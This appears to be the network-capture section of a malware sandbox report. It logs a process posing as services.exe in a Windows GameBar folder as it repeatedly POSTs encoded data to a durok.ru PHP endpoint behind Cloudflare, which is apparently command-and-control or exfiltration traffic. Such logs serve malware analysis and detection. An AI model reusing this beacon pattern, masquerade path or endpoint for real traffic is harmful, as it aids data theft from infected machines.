                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 03 29 39 33 56 23 12 33 0e 3f 2d 25 0f 3d 21 03 15 3c 0c 25 59 3c 01 0c 56 2b 06 3f 52 20 14 2e 11 29 14 28 5c 27 35 25 04 26 21 2e 5c 05 1d 27 19 28 02 30 5a 30 0c 3e 07 29 07 3e 47 3e 3e 3d 5e 27 3c 2f 5d 21 28 25 07 37 22 3b 00 38 12 34 5e 3a 12 02 1d 2a 33 22 12 36 07 21 51 0c 1f 38 52 36 39 3b 12 27 3d 35 1f 20 20 30 08 27 2b 39 0a 22 38 34 08 24 04 23 5b 31 33 2b 55 23 3e 3b 1f 28 3d 08 12 32 59 3a 02 3d 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98')93V#3?-%=!<%Y<V+?R .)(\'5%&!.\'(0Z0>)>G>>=^'</]!(%7";84^:*3"6!Q8R69;'=5 0'+9"84$#[13+U#>;(=2Y:=%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              56 | 192.168.2.4 | 49824 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:11.015789032 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:11.364842892 CET | 2548 | OUT | Data Raw: 59 5c 5b 5b 54 5a 59 57 5e 58 52 54 56 5d 58 54 54 52 5b 5c 56 5e 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y\[[TZYW^XRTV]XTTR[\V^SZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z+W++)T5[,-Q>4&$$("/,W4"Y9);<="Z.#Z*6
                                                                                                                              Dec 26, 2024 17:18:12.230376005 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:12.481782913 CET | 796 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:12 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9LpavrYyEIWezXQFBBQmyUrNOHD5CsfxSqFIadlhS0dNhRboKYaIlUAcRqSXkwMDnexE6T8B4ruzUV4%2FQTK3uKUAt9WlWRUkSo1%2BdvqhPkH7lTdZojeH%2BQsgzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262a9492dde93-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3861&min_rtt=1620&rtt_var=5090&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=74672&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              57 | 192.168.2.4 | 49825 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:12.298702002 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:12.647907019 CET | 2128 | OUT | Data Raw: 5c 59 5e 51 51 5b 5c 55 5e 58 52 54 56 5f 58 53 54 5c 5b 5e 56 53 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y^QQ[\U^XRTV_XST\[^VSSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z+!+:*628^,-*>'Z#<,#-*?+,Y+%"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:13.477473021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:13.733740091 CET | 945 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:13 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AYlGfDBkS3tjmeWbmGQwSgrFScv%2BNlc8tcQmqLwnRMUSPMIU6Qh7ahIU3kdHvIhHf6zjFxZAxJDk00E%2Fb58N%2FFwv5X1RfmRPLEvjh3xI2FHznWi6TtlsN3EBOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262b13be80f8b-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4067&min_rtt=1595&rtt_var=5544&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=68294&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 13 3d 07 09 56 23 2c 20 13 3c 13 08 19 3d 31 29 5c 3c 32 2e 06 3c 2f 00 1f 2b 16 0d 52 23 3a 2e 5c 3e 14 24 13 26 25 26 5b 25 21 2e 5c 05 1d 24 07 3f 02 30 10 27 32 36 07 2a 3e 2a 46 2a 58 22 02 30 2f 05 5b 20 2b 22 17 20 1f 01 05 2e 2c 20 5e 2e 2c 20 12 3c 30 2e 5a 36 07 21 51 0c 1f 38 56 21 29 2b 12 27 2e 2a 0a 36 1e 34 0d 32 2b 31 0d 35 05 0d 57 27 14 23 11 25 23 3b 56 37 3d 30 0a 28 5b 3d 07 25 11 36 04 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$=V#, <=1)\<2.</+R#:.\>$&%&[%!.\$?0'26*>*F*X"0/[ +" ., ^., <0.Z6!Q8V!)+'.*642+15W'#%#;V7=0([=%6))%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              58 | 192.168.2.4 | 49831 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:12.715503931 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:13.071080923 CET | 2548 | OUT | Data Raw: 5c 59 5b 5b 54 58 59 56 5e 58 52 54 56 5e 58 55 54 55 5b 5e 56 5e 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y[[TXYV^XRTV^XUTU[^V^SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$_(20>9Q"!';1=0';X",8#>-:7>3$="Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:13.894951105 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:14.145729065 CET | 799 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:13 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JIkkwSFF%2F%2Fryk5JMKvMvib0sJBZ032KcHItVXUNyf0rk2U9LrdGE6Hk4lcprNM6%2BGGidK1JVcAZ7PrPFTYNdcgUg%2BYplOkfv2g81aR0pSmTMa3CKuYi585TYFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262b3cf7b43f7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8614&min_rtt=1759&rtt_var=14370&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=25794&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              59 | 192.168.2.4 | 49832 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:14.388128042 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:14.739933968 CET | 2548 | OUT | Data Raw: 59 51 5e 51 54 59 59 55 5e 58 52 54 56 5c 58 52 54 5d 5b 5b 56 5f 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^QTYYU^XRTV\XRT][[V_STPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(,+*5V""?;9V>$[04#Y"<$P#X-(A<0+5"Z.#Z*2


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              60 | 192.168.2.4 | 49834 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:14.861882925 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:15.209330082 CET | 2128 | OUT | Data Raw: 59 5c 5e 5b 51 5c 5c 56 5e 58 52 54 56 5b 58 55 54 56 5b 5a 56 51 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y\^[Q\\V^XRTV[XUTV[ZVQSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$_( <=#2'8X-='.Y'?Z7?#4Z99'<3<="Z.#Z*.
                                                                                                                              Dec 26, 2024 17:18:16.047468901 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:16.305658102 CET | 952 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:16 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpHXPoFwudJgRnE86G43vs3pHcMPqffMNj%2F11ws%2F74d4ogYf%2FiE%2BmVtLLYv7lfVZvCSctjrVroHoIHTHuqqcRvu%2BWJ%2Fc9ggFc6hFpE2fpmlZHloptfvPye8cpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262c14f614310-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3171&min_rtt=1727&rtt_var=3536&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=109923&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 00 3d 2a 24 0a 22 3c 2c 56 2b 03 31 09 2a 57 3e 01 2b 21 39 1a 28 3c 22 56 2a 38 2b 53 37 04 04 11 29 14 28 5d 32 08 08 5c 26 21 2e 5c 05 1d 27 17 3e 3b 05 02 33 0c 0c 07 3e 00 07 1b 29 10 17 18 24 01 0e 04 34 3b 0c 5a 34 57 2b 04 2c 05 23 03 2e 2c 20 5f 28 23 32 11 22 17 21 51 0c 1f 3b 0e 21 29 27 5e 26 3d 25 1f 21 33 37 54 25 38 2e 1f 21 15 2f 1e 27 2a 27 5a 25 0d 0d 52 37 2d 3f 10 3f 3d 39 00 25 59 22 04 29 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'=*$"<,V+1*W>+!9(<"V*8+S7)(]2\&!.\'>;3>)$4;Z4W+,#., _(#2"!Q;!)'^&=%!37T%8.!/'*'Z%R7-??=9%Y")%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              61 | 192.168.2.4 | 49839 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:14.986026049 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:15.333659887 CET | 2548 | OUT | Data Raw: 5c 5b 5b 58 54 59 5c 55 5e 58 52 54 56 5f 58 55 54 53 5b 54 56 51 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[XTY\U^XRTV_XUTS[TVQS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$)" [<>#!(;>?4%$4043"<1,*<(/+%"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:16.162266970 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:16.413836002 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:16 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bM0D5hOXlA%2BbgL2ciaS5vbkPZzrZBNy6AHJndfXqvUAwfx7%2BYSIMWGhOHAauW9fLipx3NgJs2lA%2B%2B%2F4UOJVOxhZ9jPi8hpA9%2FOKe2UaO97wIjS%2FM3xIQQ%2F01rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262c1fb4642e7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8165&min_rtt=1530&rtt_var=13845&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=26732&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              62 | 192.168.2.4 | 49840 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:16.711566925 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:17.067986012 CET | 2548 | OUT | Data Raw: 59 50 5b 5f 54 59 5c 57 5e 58 52 54 56 5c 58 52 54 56 5b 5c 56 5e 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP[_TY\W^XRTV\XRTV[\V^STPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'?>)&6$8>5W='>0$ ,<P <&.*<D?08>"Z.#Z*2


Session ID: 63 | Source IP: 192.168.2.4 | Source Port: 49846 | Destination IP: 104.21.93.162 | Destination Port: 80 | PID: 2308 | Process: C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:17.454895020 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:17.802299023 CET | 2108 | OUT | [request body]
Dec 26, 2024 17:18:18.634217978 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:18.905492067 CET | 949 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:18 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9sbMCttX4UvbNvL5FlJRhGJgF6B1RoED2NVzf4s%2BxbfZu277Q5Vp9YLfeVM7v%2FNlzE5kXcC7X9AQBjchKMl%2B4amtunHryV%2Bkxjuz3%2F9vVlt1qWNPAVEzDVJHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262d16c2f8c39-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4241&min_rtt=1889&rtt_var=5414&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2439&delivery_rate=70490&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID: 64 | Source IP: 192.168.2.4 | Source Port: 49847 | Destination IP: 104.21.93.162 | Destination Port: 80 | PID: 2308 | Process: C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:17.578418970 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:17.927375078 CET | 2548 | OUT | [request body]
Dec 26, 2024 17:18:18.756412029 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:19.009543896 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:18 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDmD%2BCMXyj3ROpUm29j3ahy2aYvNbwwkhlGZHe4nxnQ0EGHSSKfhjAFaB7Qs5k3AOUNGp2tPUexWP%2Bh3CPLlOnHVWQetF3Cse9CAk%2FiY%2FlN9%2BXehXZX6ZfBWxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262d23826f5f4-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8257&min_rtt=1656&rtt_var=13824&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=26803&cwnd=102&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID: 65 | Source IP: 192.168.2.4 | Source Port: 49848 | Destination IP: 104.21.93.162 | Destination Port: 80 | PID: 2308 | Process: C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:19.749393940 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue


Session ID: 66 | Source IP: 192.168.2.4 | Source Port: 49854 | Destination IP: 104.21.93.162 | Destination Port: 80 | PID: 2308 | Process: C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:20.095247984 CET | 331 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2092
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
Dec 26, 2024 17:18:20.443094015 CET | 2092 | OUT | [request body]
Dec 26, 2024 17:18:21.275500059 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:21.529951096 CET | 949 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:21 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axMs%2BToI8WB8f1oaD%2BT4TxavsZUFEMtsIGNTVgRMA%2BXO43ij0fgq9Y6Z6B2fD2Bp2qqn%2FiZU1bhQGuNqvQgacfxui92uAuNIFsSmAcqqUcNioG4%2B0ws00Po05Q%3D%3D"}],"group":"cf-nel","max_age":604800}
